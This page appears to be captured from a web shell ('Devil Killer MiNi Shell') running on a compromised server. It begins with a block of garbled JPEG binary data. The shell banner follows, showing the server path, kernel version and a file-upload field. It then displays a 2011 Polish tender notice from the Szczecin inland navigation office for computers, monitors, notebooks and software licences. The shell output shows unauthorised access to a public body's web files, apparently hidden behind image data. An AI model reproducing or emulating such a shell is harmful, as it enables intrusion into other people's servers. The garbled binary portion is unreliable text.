JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111206/319613-N-2011.html

<p class="kh_header"><b>Szczecin: Dostawa sprzętu komputerowego i oprogramowania.</b><br>
<b>Numer ogłoszenia: 319613 - 2011; data zamieszczenia: 06.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Żeglugi Śródlądowej , pl. Batorego 4, 70-207 Szczecin, woj. zachodniopomorskie, tel. 91 43 40 279, 44 03 354, faks 91 43 40 129.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wroc.uzs.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu komputerowego i oprogramowania..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Ogólny opis przedmiotu zamówienia.
1.	Przedmiotem zamówienia jest wykonanie dostawy 10 komputerów klasy PC, 10 monitorów LCD oraz 5 notebooków wraz z odpowiednim oprogramowaniem i akcesoriami. 
a.	Szczegółowe parametry techniczne pojedynczego komputera klasy PC zostały określone w Tabeli I pn: Specyfikacja techniczna komputera klasy PC - 10 sztuk.
b.	Szczegółowe parametry techniczne pojedynczego monitora komputerowego zostały określone  w Tabeli II pn: Specyfikacja techniczna monitora komputerowego -10 sztuk.
c.	Szczegółowe parametry techniczne pojedynczego notebooka rodzaju 1 zostały określone w Tabeli III pn: Specyfikacja techniczna notebooka rodzaju 1 - 2 sztuki.
d.	Szczegółowe parametry techniczne pojedynczego notebooka rodzaju 2 zostały określone w Tabeli IV  pn: Specyfikacja techniczna notebooka rodzaju 2 - 3 sztuki.
e.	Pakiet systemu operacyjnego do komputerów - 10 sztuk licencji.
f.	Pakiet zintegrowanych aplikacji biurowych - 15 szt. Licencji. 
Tabela I - Specyfikacja techniczna komputera klasy PC.

Lp.	Rodzaj komponentu	Specyfikacja techniczna komponentu	Ilość
1.	Procesor	Intel Core i7-2600 3,4 GHz lub równoważny
a)	Częstotliwość taktowania: 3,4 GHZ,
b)	Rodzaj obudowy: LGA1155 lub równoważne,
c)	Ilość rdzeni: 4,
d)	Architektura procesora: 64 bitowa,
e)	Proces technologiczny: 32 nm,
f)	Ilość pamięci cache L1: 128 KB (po 32 KB na rdzeń),
g)	Ilość pamięci cache L2: 1 MB (po 256 KB na rdzeń),
h)	Ilość pamięci cache L3: 8 MB (współdzielona przez wszystkie rdzenie),
i)	Chłodzenie: aktywne,
j)	Wspierane technologie: Intel Virtualization Technology, Intel Trusted Execution Technology, Intel Hyper-Threading Technology, Intel SSE 4.1/4.2/AVX lub równoważne,
k)	Zintegrowana grafika HD2000 lub równoważna.	1
2.	Płyta główna	Parametry:
a)	Gniazdo procesora: LGA 1155 lub równoważne,
b)	Ilość gniazd procesora: 1,
c)	Ilość gniazd pamięci: 4,
d)	Rodzaj gniazd pamięci: DIMM,
e)	Obsługiwane typy pamięci: DDR3 1333 MHz,
f)	Maksymalna wielkość pamięci: 16GB,
g)	Dwukanałowa obsługa pamięci: tak,
h)	Chipset: Intel H67 Express lub równoważny,
i)	Zintegrowana karta sieciowa: 10/100/1000 Mbit ethernet,
j)	Zintegrowana karta dźwiękowa: tak.
k)	Gniazda rozszerzeń: 1 slot PCIe x16 (grafika),  3 sloty  PCIe x1,
l)	Zintegrowane złącza dysków twardych: 4x SATA 3Gb/s,
m)	Złącza zewnętrzne: 1x RJ-45, 8x USB 2.0/1.1, 6x audio jack, 1x coaxial S/PDIF Out, 1x optyczny S/PDIF Out, 1x D-Sub, 1x eSATA, 1 x HDMI	1
3.	Obudowa	Parametry:
a)	Typ: Mini Tower,
b)	Alokacje 5,25 zewnętrzne: min. 2,
c)	Alokacje 3,5 zewnętrzne: min. 1,
d)	Alokacje 3,5 wewnętrzne: min. 2,
e)	Złącza na panelu przednim: 4x USB 2.0, mikrofon, głośnik, czytnik kart flash,
f)	Zasilacz: minimum 350W,
g)	Wentylator: tył obudowy: tak.	1
4.	Zasilacz	Parametry:
a)	Minimum Moc: 350W,
b)	Napięcie wejściowe 100-127V ~/10A, 50~60Hz,
c)	Napięcie wejściowe 200-240V ~/5A, 50~60Hz,
d)	Możliwość zmiany napięcia wejściowego przełącznikiem na zasilaczu,
e)	 Złącza: 1x 24pin ATX, 1x 4pin 12V DC , 1x 6pin PCIe,  4x sata.	1
5.	Pamięć RAM	HMT351U6CFR8C o pojemności 4GB lub równoważne
a)	Rodzaj pamięci: DDR3 Unbuffered DIMM,
b)	Standard: DDR3-PC10600,
c)	Częstotliwość pracy: 1333 MHz,
d)	Pojemność: 4 GB,
e)	Ilość pinów: 240,
f)	Prefetch: 8 bit,
g)	Opóźnienie: 9-9-9,
h)	Napięcie VDDQ: 1.5+-0.075 V,
i)	Pozłacane styki: tak,
j)	tRCmin: 49,5 ns,
k)	tRASmin: 36 ns.	2
6.	Dysk twardy	Seagate Barracuda 7200.12 1TB lub równoważny
a)	Typ interfejsu: Serial ATA 6.0Gbps,
b)	Pojemność: minimum 1 TB,
c)	Ilość pamięci cache: min. 32 MB,
d)	Prędkość obrotowa: 7200 rpm,
e)	Poziom hałasu (bezczynność): maksymalnie 27 dB,	1
7.	Napęd optyczny	DVD?RW Super Multi (+ DVD-RAM) Dual Layer	1
8.	Klawiatura	a) 104 klawisze,
b) USB,
c) odporna na zalanie	1
9.	Mysz	a) 3-przeciskowa (2 przyciski i kółko)
b) rozdzielczość minimum 1000dpi
c) optyczna
d) złącze USB, dł.przewodu minimum 1,8m	1
10.	Gwarancja	3 letnia gwarancja on-site Next Bussines Day	
Tabela II - Specyfikacja techniczna monitora komputerowego.
Lp.	Rodzaj komponentu	Wymagane minimalne parametry techniczne monitora komputerowego
1.	Monitor	Parametry:
a)	Rozmiar: 23 cale lub większy panoramiczny,
b)	Rozdzielczość: minimum 1920 x 1080,
c)	Matryca: IPS, matowa,
d)	Kontrast: Dynamic Contrast 2 000 000:1 (typowy 1 000:1),
e)	Jasność: minimum 300 cd/m2,
f)	Czas reakcji: maksimum 8 ms GtG,
g)	Kąty widoczności (poziomo/pionowo): 178/178,
h)	Ilość kolorów obrazu: 16,7 mln,
i)	Gniazda wejściowe: 15 pin D-SUB, DVI-D (z HDCP), Display Port, 4 porty USB 2.0,
j)	Pobór prądu(włączony): 30W (70W maksymalnie),
k)	Pobór prądu(tryb czuwania): 0,5 W,
l)	Dodatkowe funkcjonalności: obrotowa podstawa, pivot, regulacja nachylenia i wysokości.
Tabela III - Specyfikacja techniczna notebooka rodzaju 1.
Lp.	Rodzaj komponentu	Wymagane minimalne parametry techniczne notebooka
1.	Ekran	Wyświetlacz LED HD o przekątnej 14cala, rozdzielczość 1600x900, z powłoką przeciwodblaskową
2.	Chipset	Mobile Intel QM67 Express lub równoważny
3.	Procesor	Procesor Intel Core i7-2620M (2,70 GHz, 4 MB pamięci podręcznej L3) lub równoważny
4.	Pamięć RAM	4 GB DDR3 SDRAM (1333Mhz), możliwość rozbudowy do 16 GB
5.	Dysk twardy	minimum 320 GB, SATA, 7200 obr/min.
6.	Karta graficzna	Karta graficzna AMD RAdeon HD 6470M z 1 GB wydzielonej pamięci wideo DDR3 lub równoważna
7.	Audio	Karta dźwiękowa zintegrowana lub inna, wbudowane głośniki stereo.
8.	Karta sieciowa	Gigabit Ethernet (10/100/1000Mbit) - RJ 45
9.	Łączność bezprzewodowa	-wireless LAN 802.11 a/b/g/n ,
-wbudowany moduł Bluetooth,
- moduły szerokopasmowej, bezprzewodowej transmisji danych WWAN/3G (lub 4G)
10.	Porty/złącza	- minimum 2x USB 3.0,
- minimum 1x USB 2.0,
- złącze słuchawek, złącze mikrofonu,
- RJ-45,
- VGA,
- DisplayPort,
- 1x E-SATA/USB Combo,
- 1x FireWire (IEEE1394),
- czytnik kart pamięci (obsługiwane karty: SD, MMC,
- złącze stacji dokującej
- gniazdo kart Express Card/54
- czytnik kart procesorowych
11.	Klawiatura i panel dotykowy	- klawiatura odporna na zalanie,
- panel dotykowy z obsługą przewijania i gestów oraz z dwoma przyciskami mechanicznymi
12.	Napęd optyczny
	napęd DVD+/-RW (odczyt i zapis dysków CD/DVD)

13.	Bateria	-minimum  62Wh, 
-minimum 6-ogniwowa, Li-Ion
14.	Zasilacz	minimum  90W
15.	Kamera	Wbudowana kamera HD
16.	Bezpieczeństwo	-wbudowany czytnik linii papilarnych,
-wbudowany układ zabezpieczający TPM 1.2
17.	Waga	waga max 2,5 kg (bez zasilacza)
18.	Gwarancja	3 lata on-site Next Bussines Day
19.	System operacyjny	Microsoft Windows7 Professional PL 64-bit lub równoważny (wymagane parametry równoważności zostały opisane punkcie 2, podpunkcie 1 opisu przedmiotu zamówienia)
Tabela IV - Specyfikacja techniczna notebooka rodzaju 2.
Lp.	Nazwa komponentu	Wymagane minimalne parametry techniczne notebooka
1.	Ekran	wyświetlacz LED HD o przekątnej 13,3cala, rozdzielczość 1366x768, z powłoką antyrefleksyjną
2.	Chipset	Mobile Intel QM67 Express lub równoważny
3.	Procesor	Intel Core i5-2410M lub równoważny
4.	Pamięć RAM	4 GB DDR3 SDRAM (1333Mhz), możliwość rozbudowy do 16 GB
5.	Dysk twardy	minimum 500 GB, SATA, 7200 obr/min.
6.	Karta graficzna	zintegrowana Intel Graphics Media Accelerator HD lub równoważna
7.	Audio	karta dźwiękowa zintegrowana lub inna, wbudowane głośniki stereo.
8.	Karta sieciowa	Gigabit Ethernet (10/100/1000Mbit) - RJ 45
9.	Łączność bezprzewodowa	Wireless LAN 802.11 b/g/n , wbudowany moduł Bluetooth
10.	Porty/złącza	- minimum 3x USB 2.0,
- złącze słuchawek, złącze mikrofonu,
- RJ-45,
- VGA,
- DisplayPort,
- 1x E-SATA/USB Combo,
- 1x FireWire (IEEE1394),
- czytnik kart pamięci (obsługiwane karty: SD, SDHC, SDXC, MMC, MMC Plus)
- gniazdo kart Express Card/54
11.	Klawiatura i panel dotykowy	- klawiatura odporna na zalanie,
- panel dotykowy z dwoma przyciskami mechanicznymi
12.	Napęd optyczny	napęd DVD+/-RW (odczyt i zapis dysków CD/DVD)
13.	Bateria	-minimum 55Wh,
-minimum 6-ogniwowa, Li-Ion
14.	Zasilacz	minimum 65W
15.	Kamera	Wbudowana kamera HD
17.	Waga	waga max 2 kg (bez zasilacza)
19.	Gwarancja	1 rok
16.	System operacyjny	Microsoft Windows7 Professional PL 64-bit lub równoważny (wymagane parametry równoważności zostały opisane punkcie 2. podpunkcie 1 opisu przedmiotu zamówienia) 

2.	Przedmiotem zamówienia jest wykonanie dostawy 10 szt. licencji Windows7 Professional 64-bit lub równoważne.
1) Wymagane parametry równoważności:
a)  możliwość dokonywania aktualizacji i poprawek systemu przez internet z możliwością wyboru instalowanych poprawek,
b)  możliwość dokonywania uaktualnień sterowników urządzeń przez internet - witrynę producenta systemu,
c)  darmowe aktualizacje w ramach wersji systemu operacyjnego przez internet   (niezbędne aktualizacje, poprawki, biuletyny bezpieczeństwa muszą być dostarczane  bez dodatkowych opłat) - wymagane podanie nazwy strony serwera www,
d)   internetowa aktualizacja zapewniona w języku polskim,
e)  wbudowana zapora internetowa (firewall) dla ochrony połączeń internetowych, zintegrowana z systemem konsola do zarządzania ustawieniami zapory i regułami ip v4 i v6,
f)   zlokalizowane w języku polskim, co najmniej następujące elementy: menu, pomoc, komunikaty systemowe,
g)   możliwość pracy w środowisku domenowym Active Directory,
h)   możliwość zdalnej automatycznej instalacji, konfiguracji, administrowania oraz aktualizowania systemu.
2) Oprogramowanie winno być dostarczone z bezterminową licencją na użytkowanie oraz przynajmniej jednym nośnikiem umożliwiającym zainstalowanie go na komputerach. Dozwolony jest także typ licencji pozwalający przypisać system operacyjny do komputera.
3.	Przedmiotem zamówienia jest wykonanie dostawy 15 szt. licencji pakietu zintegrowanych aplikacji biurowych typu Microsoft Office Pro Plus 2010 MOLP GOV lub równoważne rozumiany jako właściwy pod względem funkcjonalnym oraz obsługi interfejsu użytkownika zamiennik umożliwiający zgodne z przeznaczeniem użytkowanie oprogramowania w sieci teleinformatycznej zamawiającego.
1) Wymagania odnośnie interfejsu użytkownika:
a)   pełna polska wersja językowa interfejsu użytkownika,
b) prostota i intuicyjność obsługi, pozwalająca na pracę osobom nieposiadającym umiejętności technicznych,
c)  możliwość zintegrowania uwierzytelniania użytkowników z usługą katalogową Active Directory wdrożoną u Zamawiającego - użytkownik raz zalogowany z poziomu systemu operacyjnego stacji roboczej ma być automatycznie rozpoznawany we wszystkich modułach oferowanego rozwiązania bez potrzeby oddzielnego monitowania go o ponowne uwierzytelnienie się. Ze względu na planowane u zamawiającego wdrożenie usługi katalogowej Active Directory dostarczone oprogramowanie musi mieć możliwość zarządzania ustawieniami poprzez polisy GPO.
2) Pakiet zintegrowanych aplikacji biurowych musi zawierać:
a)   edytor tekstów,
b)   arkusz kalkulacyjny,
c)   narzędzie do przygotowywania i prowadzenia prezentacji,
d)   narzędzie do zarządzania informacją prywatą (pocztą elektroniczną, kalendarzem, 
      kontaktami i zadaniami),
e)   system obsługi relacyjnych baz danych.
3) Edytor tekstów musi umożliwiać:
a)  edycję i formatowanie tekstu w języku polskim wraz z obsługą języka polskiego w zakresie sprawdzania pisowni i poprawności gramatycznej oraz funkcjonalnością słownika wyrazów bliskoznacznych i autokorekty,
b)  wstawianie oraz formatowanie tabel,
c)  wstawianie oraz formatowanie obiektów graficznych,
d)  wstawianie wykresów i tabel z arkusza kalkulacyjnego (wliczając tabele przestawne),
e)  automatyczne numerowanie rozdziałów, punktów, akapitów, tabel i rysunków,
f)  automatyczne tworzenie spisów treści,
g) formatowanie nagłówków i stopek stron,
h)  sprawdzanie pisowni w języku polskim,
i)  śledzenie zmian wprowadzonych przez użytkowników,
j)  nagrywanie, tworzenie i edycję makr automatyzujących wykonywanie czynności,
k)  określenie układu strony (pionowa/pozioma),
l)  wydruk dokumentów,
m) wykonywanie korespondencji seryjnej bazując na danych adresowych pochodzących z arkusza kalkulacyjnego i z narzędzia do zarządzania informacją prywatną,
n)  pracę na dokumentach utworzonych przy pomocy Microsoft Word 2003 lub Microsoft Word 2007 i 2010 z zapewnieniem bezproblemowej konwersji wszystkich elementów i atrybutów dokumentu,
o)   zabezpieczenie dokumentów hasłem przed odczytem oraz przed wprowadzaniem modyfikacji,
p)  wymagana jest dostępność do oferowanego edytora tekstu bezpłatnych narzędzi umożliwiających wykorzystanie go, jako środowiska udostępniającego formularze bazujące na schematach XML, które po wypełnieniu umożliwiają zapisanie pliku XML w zgodzie z obowiązującym prawem,
q)  wymagana jest dostępność do oferowanego edytora tekstu bezpłatnych narzędzi (kontrolki) umożliwiających podpisanie podpisem elektronicznym pliku z zapisanym dokumentem przy pomocy certyfikatu kwalifikowanego zgodnie z wymaganiami obowiązującego w Polsce prawa,
r)   wymagana jest dostępność do oferowanego edytora tekstu bezpłatnych narzędzi umożliwiających wykorzystanie go, jako środowiska udostępniającego formularze i pozwalające zapisać plik wynikowy w zgodzie z Rozporządzeniem o Aktach Normatywnych i Prawnych.
4) Arkusz kalkulacyjny musi umożliwiać:
a)   tworzenie raportów tabelarycznych,
b)   tworzenie wykresów liniowych (wraz linią trendu), słupkowych, kołowych,
c)   tworzenie arkuszy kalkulacyjnych zawierających teksty, dane liczbowe oraz formuły przeprowadzające operacje matematyczne, logiczne, tekstowe, statystyczne oraz operacje na danych finansowych i na miarach czasu,
d)  tworzenie raportów z zewnętrznych źródeł danych (inne arkusze kalkulacyjne, bazy danych zgodne z ODBC, pliki tekstowe, pliki XML, webservice),
e)  tworzenie raportów tabeli przestawnych umożliwiających dynamiczną zmianę wymiarów oraz wykresów bazujących na danych z tabeli przestawnych,
f)   wyszukiwanie i zamianę danych,
g)  wykonywanie analiz danych przy użyciu formatowania warunkowego,
h)  nazywanie komórek arkusza i odwoływanie się w formułach po takiej nazwie,
i)   nagrywanie, tworzenie i edycję makr automatyzujących wykonywanie czynności,
j)   formatowanie czasu, daty i wartości finansowych z polskim formatem,
k)   zapis wielu arkuszy kalkulacyjnych w jednym pliku,
l)   zachowanie pełnej zgodności z formatami plików utworzonych za pomocą oprogramowania Microsoft Excel 2003 oraz Microsoft Excel 2007 i 2010, z uwzględnieniem poprawnej realizacji użytych w nich funkcji specjalnych i makropoleceń,
m)  zabezpieczenie dokumentów hasłem przed odczytem oraz przed wprowadzaniem modyfikacji.
5) Narzędzie do przygotowywania i prowadzenia prezentacji musi umożliwiać:
a)   przygotowywanie prezentacji multimedialnych, które będą prezentowanie przy użyciu projektora multimedialnego,
b)   drukowanie w formacie umożliwiającym robienie notatek,
c)   zapisanie jako prezentacja tylko do odczytu,
d)   nagrywanie narracji i dołączanie jej do prezentacji,
e)   opatrywanie slajdów notatkami dla prezentera,
f)   umieszczanie i formatowanie tekstów, obiektów graficznych, tabel, nagrań dźwiękowych i wideo,
g)  umieszczanie tabel i wykresów pochodzących z arkusza kalkulacyjnego,
h)  odświeżenie wykresu znajdującego się w prezentacji po zmianie danych w źródłowym arkuszu kalkulacyjnym,
i)   możliwość tworzenia animacji obiektów i całych slajdów,
j)   prowadzenie prezentacji w trybie prezentera, gdzie slajdy są widoczne na jednym monitorze lub projektorze, a na drugim widoczne są slajdy i notatki prezentera,
k.   pełna zgodność z formatami plików utworzonych za pomocą oprogramowania MS PowerPoint 2003, MS PowerPoint 2007 i 2010.
6) Narzędzie do zarządzania informacją prywatną (pocztą elektroniczną, kalendarzem,  kontaktami i zadaniami) musi umożliwiać:
a)  pobieranie i wysyłanie poczty elektronicznej z serwera pocztowego,
b)  filtrowanie niechcianej poczty elektronicznej (SPAM) oraz określanie listy zablokowanych i bezpiecznych nadawców,
c)  tworzenie katalogów, pozwalających katalogować pocztę elektroniczną,
d)  automatyczne grupowanie poczty o tym samym tytule,
e) tworzenie reguł przenoszących automatycznie nową pocztę elektroniczną do określonych katalogów bazując na słowach zawartych w tytule, adresie nadawcy i odbiorcy,
f)  oflagowanie poczty elektronicznej z określeniem terminu przypomnienia,
g)  zarządzanie kalendarzem,
h)  udostępnianie kalendarza innym użytkownikom,
i)  przeglądanie kalendarza innych użytkowników,
j)  zapraszanie uczestników na spotkanie, co po ich akceptacji powoduje automatyczne wprowadzenie spotkania w ich kalendarzach,
k)  zarządzanie listą zadań,
l)   zlecanie zadań innym użytkownikom,
m) zarządzanie listą kontaktów,
n)  udostępnianie listy kontaktów innym użytkownikom,
o)  przeglądanie listy kontaktów innych użytkowników,
p)  możliwość przesyłania kontaktów innym użytkowników.
  7) System obsługi relacyjnych baz danych musi umożliwiać:
a)  tworzenie projektów poprzez gotowe szablony,
b)  śledzenie, tworzenie raportów i udostępnianie danych innym użytkownikom,
c)  dodawanie funkcji automatyzujących i wyrażeń złożonych bez konieczności pisania kodu,
d) zachowanie pełnej zgodności z formatami plików utworzonych za pomocą oprogramowania Microsoft Access 2003 oraz Microsoft Access 2007 i 2010, z uwzględnieniem poprawnej realizacji użytych w nich funkcji specjalnych i makropoleceń.
 8) Oprogramowanie winno być dostarczone z bezterminową licencją na użytkowanie z możliwością przenoszenia licencji (licencja nie może być przywiązana do sprzętu).
4.	Do każdego zestawu komputerowego muszą zostać dołączone następujące akcesoria:
1)	2 kable zasilające (do PC i monitora),
2)	kabel D-Sub,
3)	płyta ze sterownikami do monitora,
4)	instrukcja obsługi do płyty głównej,
5)	płyta ze sterownikami do płyty głównej,
6)	kabel SATA do podłączenia napędu optycznego SATA.
5.	Zamawiający wymaga, aby Wykonawca dostarczył przedmiot zamówienia do siedziby Zamawiającego na swój koszt w terminie ustalonym z Zamawiającym. Odpowiedzialność i wszelkie ryzyko do momentu dostawy do Zamawiającego ponosi Wykonawca.
6.	Wykonawca musi dostarczyć zestawy komputerowe kompletne, przetestowane i zawierające wszystkie niezbędne sterowniki, instrukcje oraz okablowanie dostarczane przez producentów poszczególnych komponentów zestawu komputerowego.
7.	Zamawiający wymaga aby każdy zestaw komputerowy został oznaczony naklejką z nazwą Wykonawcy i unikalnym numerem. Oznaczenie powinno zostać naniesione z tyłu lub na górze obudowy komputera i monitora.
8.	Wykonawca dostarczy Zamawiającemu dokumenty pozwalające na skorzystanie z gwarancji dotyczącej komponentów przedmiotu sprzedaży (np. wypełnione i opieczętowane karty gwarancyjne).
9.	Dostarczony sprzęt musi być fabrycznie nowy (nie używany).
10.	Dostarczony sprzęt musi spełniać wszystkie wymogi dotyczące bezpieczeństwa oraz zużycia energii określone w obowiązującym w Polsce prawie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.21.00.00-4, 30.21.31.00-6, 48.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od dokonania opisu sposobu oceny spełnienia powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać iż w ciągu ostatnich 3 lat przed dniem otwarcia ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej dwie dostawy sprzętu komputerowego o wartości nie niższej niż 50 000.00 zł każda.
Ocena spełnienia warunku będzie dokonana na zasadzie spełnia/nie spełnia na podstawie potwierdzających go dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od dokonania opisu sposobu oceny spełnienia powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od dokonania opisu sposobu oceny spełnienia powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od dokonania opisu sposobu oceny spełnienia powyższego warunku.</p>
</li></ul></li></ul>
